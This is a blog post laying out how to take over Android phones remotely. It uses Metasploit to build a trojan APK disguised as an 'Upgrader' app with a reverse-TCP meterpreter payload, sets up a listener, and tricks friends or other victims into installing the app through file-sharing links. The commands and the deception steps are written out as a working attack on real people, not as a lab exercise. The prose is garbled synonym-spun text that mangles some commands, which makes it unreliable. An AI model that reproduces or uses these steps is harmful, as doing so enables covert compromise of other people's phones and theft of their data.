Video of the Day

header ads

Hack Android Using Kali (Remotely)

Kunal Mehra December 17, 2020

 Hack Android Using Kali (Remotely)





This is an instructional exercise disclosing how to hack android phones with Kali Linux.
I can't perceive any instructional exercises clarifying this Hack/Exploit, thus, I made one. 
(In any case, you may definitely think about this)



Step-1:   Fire-Up Kali: 
* Open a terminal, and make a Trojan .apk 
You can do this by composing : 




* msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R >/root/Upgrader.apk (supplant LHOST with your own IP) 


 * You can likewise hack android on WAN for example through Internet by utilizing your Public/External IP in the LHOST and by port sending (inquire as to whether you have issues in the remark area)


Step-2:Open Another Terminal: 




* Open another terminal until the record is being created. 

* Burden metasploit reassure, by composing : msfconsole 


Step-3:  Set-Up a Listener: 


After it loads(it will require some investment), load the multi-overseer abuse by composing : use misuse/multi/controller
Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp



To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)


Step-4:Adventure! 


Finally type: exploit to begin the audience. 
Duplicate the application that you made (Upgrader.apk) from the root folder to your android phone






At that point send it utilizing Uploading it to Dropbox or any sharing site (like www.speedyshare.com). 


At that point send the connection that the Website offered you to your companions and adventure their telephones (Only on LAN, yet in the event that you utilized the WAN technique, at that point you can utilize the endeavor anyplace on the INTERNET)






Let the Victim introduce the Upgrader app(as he would think it is intended to redesign a few highlights on his telephone) 
Nonetheless, the alternative of recompense for Installation of applications from Unknown Sources should be empowered (if not) from the security settings of the android telephone to permit the Trojan to introduce. 


Also, when he clicks Open...

 

Step 5:BOOM! 


There comes the meterpreter brief:





End This :


Continue coming for additional! 
Some post modules that work for windows probably won't work in android 
For Eg: run killav, persistence (persistent backdoor) and so forth


Tags:

Post a Comment

0 Comments